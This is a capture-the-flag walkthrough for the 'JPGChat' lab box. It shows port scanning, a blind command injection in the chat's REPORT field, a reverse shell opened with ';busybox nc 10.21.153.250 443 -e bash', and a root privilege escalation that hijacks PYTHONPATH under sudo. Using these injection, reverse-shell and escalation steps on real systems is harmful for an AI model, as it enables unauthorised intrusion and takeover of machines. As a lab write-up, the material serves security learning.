JPGChat

Enumeration:

Lets run nmap to see open ports:

sudo nmap -sCV -p- --min-rate 4000 -oN nmap/allports -vv 10.10.152.65

We only have two open ports SSH on port 22 and unknown service on port 3000, but we can check if we can access it in the browser:

It seems like it is a service that we can interact with using message or report to write something.

Lets try to connect to it and interact with it using netcat:

nc 10.10.152.65 3000

It looks like we can send something to the admin.

But in the program description it says that the source code is on github which means it is an open source program, lets check the source code to try to find something that might help us proceed:

Using google dorking:

We will find the repository:

It has the script and a readme file:

Lets check the source code of the script:

If we take a closer look, we will see that after we send REPORT, it will asks for our username and our report, which will redirect it to a command to save it in a file using system level commands without any sanitization, but we can not see the result.

Exploitation:

Lets try blind command injection with ping:

;ping 10.21.153.250 -c 3

And run tcpdump to receive the result:

tcpdump -i tun0 icmp

We will see that it will hang for three seconds, and in tcpdump:

We received three icmp packets which confirms that we have blind command injection, now lets get a shell on the box:

nc -nlvp 443
;busybox nc 10.21.153.250 443 -e bash

Lets upgrade our shell to interactive shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
CTRL + Z
stty raw -echo ; fg
stty rows 36 cols 172

Post-Exploitation:

After I performed some little enumeration I found that we can this script as root user:

sudo -l

We can use and an set our PYTHONPATH environment variable to whatever we want since we have SETENV, lets find out what is inside the test_module script:

cat /opt/development/test_module.py

It is importing everything in compare module, and since we have the ability to manipulate the PYTHONPATH, we can tell the sudo command to run our compare module instead of the legitimate one, but before that we want to create a malicious one that can permit us to get root privileges:

import pty
pty.spawn("/bin/bash")
sudo PYTHONPATH=/tmp/ /usr/bin/python3 /opt/development/test_module.py

Here is the root flag, you can find the user flag in wes home directory.

PreviousLinuxNextHackMyVm

Last updated